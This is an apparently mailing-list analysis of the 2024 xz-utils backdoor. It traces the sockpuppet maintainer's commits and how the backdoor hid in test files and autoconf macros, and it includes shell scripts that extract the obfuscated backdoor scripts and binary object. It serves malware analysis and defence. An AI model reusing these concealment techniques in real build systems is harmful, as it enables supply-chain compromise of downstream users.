[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
Re: GNU Coding Standards, automake, and the recent xz-utils backdoor
From: |
Jacob Bachmeyer |
Subject: |
Re: GNU Coding Standards, automake, and the recent xz-utils backdoor |
Date: |
Mon, 01 Apr 2024 00:34:02 -0500 |
User-agent: |
Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.8.1.22) Gecko/20090807 MultiZilla/1.8.3.4e SeaMonkey/1.1.17 Mnenhy/0.7.6.0 |
Tomas Volf wrote:
On 2024-03-31 14:50:47 -0400, Eric Gallager wrote:
With a reproducible build system, multiple maintainers can "make dist"
and compare the output to cross-check for erroneous / malicious dist
environments. Multiple signatures should be harder to compromise,
assuming each is independent and generally trustworthy.
This can only work if a package /has/ multiple active maintainers.
Well, other people besides the maintainers can also run `make dist`
and `make distcheck`. My idea was to get end-users in the habit of
running `make distcheck` themselves before installing stuff. And if
that's too much to ask of end users, I'd also point out that there are
multiple kinds of maintainer: besides the upstream maintainer, there
are also usually separate distro maintainers. Even if there's only 1
upstream maintainer, as was the case here, I still think that it would
be good to get distro maintainers in the habit of including `make
distcheck` as part of their own release process, before they accept
updates from upstream.
What would be helpful is if `make dist' would guarantee to produce the same
tarball (bit-to-bit) each time it is run, assuming the tooling is the same
version. Currently I believe that is not the case (at least due to timestamps).
A "tardiff" tool that ignores timestamps would be a solution to that
problem, but not to this backdoor.
Combined with GNU Guix that would allow simple way to verify that `make dist'
was used, and the resulting artifact not tampered with, even without any central
signing.
The Guix "challenge" operation would not have detected this backdoor
because *it* *was* *in* *the* *upstream* *release*. The build service
works from that release tarball and you build from that same release
tarball. GNU Guix ensures an equivalent build environment and your
results *will* match---either the backdoor was not inserted or it was
inserted in both builds.
The flow of the attack as I understand it was:
(0) (speculation on motivation) The attacker wanted a "Golden Key"
to SSH and started looking for ways to backdoor sshd.
(1) The attacker starts a sockpuppet campaign and manages to get
one of his sockpuppets appointed co-maintainer of xz-utils.
(2) [2023-06-27] The sockpuppet merges a pull request believed to
be from another sockpuppet in commit
ee44863ae88e377a5df10db007ba9bfadde3d314.
(3) [2024-02-15] The sockpuppet "updates m4/.gitignore" to add
build-to-host.m4 to the list in commit
4323bc3e0c1e1d2037d5e670a3bf6633e8a3031e.
(4) [2024-02-23] The sockpuppet adds 5 files to the xz-utils
testsuite in commit cf44e4b7f5dfdbf8c78aef377c10f71e274f63c0.
(5) [2024-03-08] To cover tracks, the sockpuppet finally adds a
test using bad-3-corrupt_lzma2.xz in commit
a3a29bbd5d86183fc7eae8f0182dace374e778d8.
(6) [2024-03-08] The sockpuppet revises two of those files with a
lame excuse in commit a3a29bbd5d86183fc7eae8f0182dace374e778d8.
The quick analysis of the Git history supporting steps 2 - 6 above has
turned up another interesting detail: no version of configure.ac
actually committed ever used the gl_BUILD_TO_HOST macro. An analysis
found on pastebin noted that build-to-host.m4 is a dependency of
gettext.m4. Following up finds commit
3adaddd73c8edcceaed059e859bd5262df65fc5a of 2023-02-18 in the GNU
gettext repository introduced the use of gl_BUILD_TO_HOST, apparently as
part of moving some existing path translation logic to gnulib and
generalizing it for use elsewhere. This commit is innocent (it is
*extremely* unlikely that Bruno Haible was involved in the backdoor
campaign) and also explains why the backdoor was checking for "dnl
Convert it to C string syntax." in m4/gettext.m4: that comment was
removed in the same commit that switch to using gl_BUILD_TO_HOST. The
change to gettext also occurred about a year before the sockpuppet began
to take advantage of it.
It almost "feels like" the attacker was waiting for an opportunity to
make plausible changes to autoconf macros and finally got one when
updating the m4/ files for the 5.6.0 release. Could someone with the
release tarballs confirm that m4/gettext.m4 was updated between
v5.5.2beta and v5.6.0? I doubt the entire backdoor was developed in the
week between those two commits. In fact, the timing around introducing
ifuncs suggests to me that the binary blob was at least well into
development by mid-2023.
The commit message at step 2 claims that using ifuncs with
-fsanitize=address causes segfaults. If this is true generally, the
glibc team should probably reconsider whether the abuse potential is
worth the benefit of the feature and possibly investigate how the
feature was introduced to glibc. If this was an excuse, it provided a
clever way to prevent oss-fuzz from finding the backdoor, as disabling
ifuncs provides a conveniently hidden flag to disable the backdoor.
While double-checking the above, I stumbled across another very
suspicious commit in the repository: commit
e446ab7a18abfde18f8d1cf02a914df72b1370e3 by Jia Tan on 2024-02-12
creating a separate "safe" range decoder mode because the next commit
removes some bounds checks.
Lastly on this topic, some of the blame for this needs to fall on the
systemd maintainers and their "katamari" architecture. There is no good
reason for notifications of daemon startup to pull in liblzma, but using
libsystemd for that purpose does exactly that, and ended up getting
xz-utils targeted as a means of getting to sshd without the OpenSSH
maintainers noticing.
I have also done a bit more work and replicated extracting the backdoors
from the repository. Here are scripts to extract them:
8<------ unpack-1.sh
#!/bin/sh
# Unpack first stage backdoor script from xz-backdoored.
# To guard against other trickery, use 7-zip for decompression.
set -x
tr "\t \-_" " \t_\-" \
< xz-backdoored/tests/files/bad-3-corrupt_lzma2.xz \
> backdoor-1.xz
7z l -slt backdoor-1.xz
7z e -y backdoor-1.xz
# EOF
8<------
8<------ unpack-2a.sh
#!/bin/sh
# Unpack second stage backdoor script from xz-backdoored.
# To guard against other trickery, use 7-zip for decompression where possible.
# Adapted from original backdoor-1 script.
set -x
extract () (
set +x # very noisy
for cycle in {1..16}; do
(head -c +1024 >/dev/null) && head -c +2048
done
(head -c +1024 >/dev/null) && head -c +939
)
7z e -so xz-backdoored/tests/files/good-large_compressed.lzma \
| extract \
| tail -c +31233 \
| tr "\114-\321\322-\377\35-\47\14-\34\0-\13\50-\113" "\0-\377" \
| tee backdoor-2a.lzma1 \
| xz -F raw --lzma1 -dc \
> backdoor-2a
# EOF
8<------
8<------ unpack-2b.sh
#!/bin/sh
# Unpack binary backdoor module from xz-backdoored.
# To guard against other trickery, use 7-zip for decompression where possible.
# Adapted from original backdoor scripts.
set -x
extract () (
set +x # very noisy
for cycle in {1..16}; do
(head -c +1024 >/dev/null) && head -c +2048
done
(head -c +1024 >/dev/null) && head -c +939
)
7z e -so xz-backdoored/tests/files/good-large_compressed.lzma \
| extract \
| LC_ALL=C sed "s/\(.\)/\1\n/g" \
| LC_ALL=C awk '
BEGIN {
FS="\n"
RS="\n"
ORS=""
m=256
for (i=0;i<m;i++) {
t[sprintf("x%c",i)]=i
c[i]=((i*7)+5)%m
}
i=0; j=0
for (l=0;l<8192;l++) {
i=(i+1)%m; a=c[i]
j=(j+a)%m; c[i]=c[j]; c[j]=a
}
}
{
v=t["x" (NF<1?RS:$1)]
i=(i+1)%m; a=c[i]
j=(j+a)%m; b=c[j]
c[i]=b; c[j]=a
k=c[(a+b)%m]
printf "%c",(v+k)%m
}' \
| tee backdoor-2b.xz \
| xz -dc --single-stream \
| ((head -c +0 >/dev/null 2>&1) && head -c +88664) \
> backdoor-2b.o
# EOF
8<------
The above scripts assume that the backdoored code has been unpacked into
xz-backdoored in the current directory. As you can see by reading them,
they fetch the backdoor code from the tests/files/bad-3-corrupt_lzma2.xz
and tests/files/good-large_compressed.lzma files.
The unpack-1 and unpack-2a scripts yield the shell script backdoor code,
while the unpack-2b script yields the binary object that was hidden in
the repository.
All backdoor-1 does is unpack and execute backdoor-2a.
Emacs makes short work (make the region span the file; C-M-\) of
indenting the backdoor-2a code, which makes the control flow clear and
helps to explain how this worked. The backdoor-2a script is run twice,
once as part of configure (possibly config.status actually), which
modifies src/liblzma/Makefile to unpack and run the backdoor-1 script
again using am__dist_setup, am__test_dir, and am__strip_prefix variables
to hide the commands that unpack and run backdoor-1, and once during
make to actually unpack the backdoor. My previous conclusion that an
unreasonably observant user might notice make not build the two affected
objects is wrong---make builds them first and the backdoor script
rebuilds them to include and call the hidden binary object. Also, it
seems that config.status somehow gets deleted during the build, since
backdoor-2a uses an if/elif/fi sequence to determine whether to alter
src/liblzma/Makefile or apply the hidden object. This is odd but does
not impede recovering the backdoor artifacts.
-- Jacob
- Re: GNU Coding Standards, automake, and the recent xz-utils backdoor,
Jacob Bachmeyer <=